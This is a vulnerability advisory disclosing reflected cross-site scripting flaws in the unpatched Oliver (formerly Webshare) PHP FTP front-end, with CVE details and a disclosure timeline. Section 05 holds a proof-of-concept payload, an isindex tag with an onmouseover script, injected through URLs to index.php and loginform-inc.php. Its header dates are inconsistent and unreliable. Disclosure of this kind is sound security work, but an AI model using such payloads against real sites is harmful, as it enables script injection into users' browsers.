Oliver 1.3.0 / 1.3.1 Cross Site Scripting

`###################################################  
  
01. ### Advisory Information ###  
  
Title: Multiple Reflected XSS vulnerabilities in Oliver (formerly   
Webshare) v1.3.1  
Date published: 2016-15-04  
Date of last update: 2014-03-04  
Vendors contacted: Oliver (formerly Webshare) v1.3.1  
Discovered by: Rv3Laboratory [Research Team]  
Severity: Medium  
  
  
02. ### Vulnerability Information ###  
  
CVE reference: CVE-2014-2710  
VU#279207  
OVI-2016-7982  
CVSS v2 Base Score: 4.3  
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
Component/s: Oliver (formerly Webshare) v1.3.1  
Class: Input Validation Error  
  
  
03. ### Introduction ###  
  
Oliver is a PHP-based front-end to FTP, released under the GPL.  
  
http://oliver.sourceforge.net/  
https://sourceforge.net/projects/oliver/  
  
  
04. ### Vulnerability Description ###  
  
Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been  
identified in the Oliver (formerly Webshare) web application.  
Oliver contains a flaw that allows multiple reflected cross-site  
scripting (XSS) attacks.  
This flaw exists because certain pages do not validate input before  
returning it to users.  
  
  
Vulnerable file(s):  
index.php (login page)  
loginform-inc.php (login form)  
  
Request Method(s):  
GET  
  
  
05. ### Technical Description / Proof of Concept Code ###  
  
The vulnerability is located in the pages  
  
http://localhost/oliver/index.php  
http://localhost/oliver/loginform-inc.php  
  
The application does not validate correctly the URL upon submission.  
The attacker can inject the malicious javascript code:  
  
<isindex x="javascript:" onmouseover="alert('Rv3Lab XSS')">  
  
http://localhost/oliver/index.php/<isindex x="javascript:"   
onmouseover="alert('Rv3Lab XSS')">  
http://localhost/oliver/loginform-inc.php/<isindex x="javascript:"   
onmouseover="alert('Rv3Lab XSS')">  
  
  
06. ### Business Impact ###  
  
This may allow an attacker to create a specially crafted URL that  
would execute arbitrary script code in a user's browser within the trust  
relationship between their browser and the server.  
  
  
07. ### Systems Affected ###  
  
This vulnerability was tested against: Oliver (formerly Webshare) v1.3.0   
and v1.3.1  
Older versions are probably affected too, but they were not checked.  
  
  
08. ### Vendor Information, Solutions and Workarounds ###  
  
Currently, there are no known upgrades or patches to correct this  
vulnerability.  
Oliver (formerly Webshare) No longer supported  
  
  
09. ### Credits ###  
  
Rv3Laboratory [Research Team] - www.Rv3Lab.org  
  
This vulnerability has been discovered by:  
Rv3Lab - [www.rv3lab.org] - research(at)rv3lab(dot)org  
Christian Catalano aka wastasy - wastasy(at)rv3lab(dot)org  
Massimo Piccinno aka MaxPic - maxpic(at)rv3lab(dot)org  
  
  
10. ### Vulnerability History ###  
  
April 03rd, 2013: Vulnerability identification  
April 18th, 2013: No response received  
April 15th, 2014: No response received - Oliver (formerly Webshare) No   
longer supported  
April 15th, 2016: Public Security advisory released  
  
  
11. ### Disclaimer ###  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise.  
We accept no responsibility for any damage caused by the use or misuse of  
this information.  
  
  
12. ### About Rv3Lab ###  
  
Rv3Lab is an independent Security Research Lab.  
For more information, please visit [www.Rv3Lab.org]  
For more information regarding the vulnerability feel free to contact the  
Rv3Research Team: research(at)rv3lab(dot)org  
  
###################################################  
`